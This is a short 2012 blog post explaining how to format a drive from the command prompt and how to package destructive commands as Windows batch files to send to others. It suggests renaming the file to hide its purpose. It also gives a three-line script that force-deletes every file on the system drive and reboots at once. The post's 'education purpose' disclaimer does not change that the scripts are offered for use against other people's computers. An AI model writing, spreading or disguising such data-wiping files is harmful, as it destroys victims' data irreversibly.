Ads 468x60px

Friday 10 August 2012

Format Hard disk drive with cmd or with notepad

Posted by Edward
If you want to format any partition through CMD then:



1. Go to start
2. Click on run
3. Write here CMD and press enter
4. Now write in CMD format c:\ /Q/X and press enter

Note: You can replace c with what drive you want to format

Or if you want to send this to others like a file then:

1. Open your notePad
2. Write in there format c:\ /Q/X
3. Then save it giving name format.bat

Note: You can replace format with any other word

If you want worst that write this in notepad and save as .bat file

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Use this carefully as this is undone-able.
Note: These tricks are for education purpose and can harm your or others pc.

Sharing is Caring

Related Posts Plugin for WordPress, Blogger...

No comments:

Post a Comment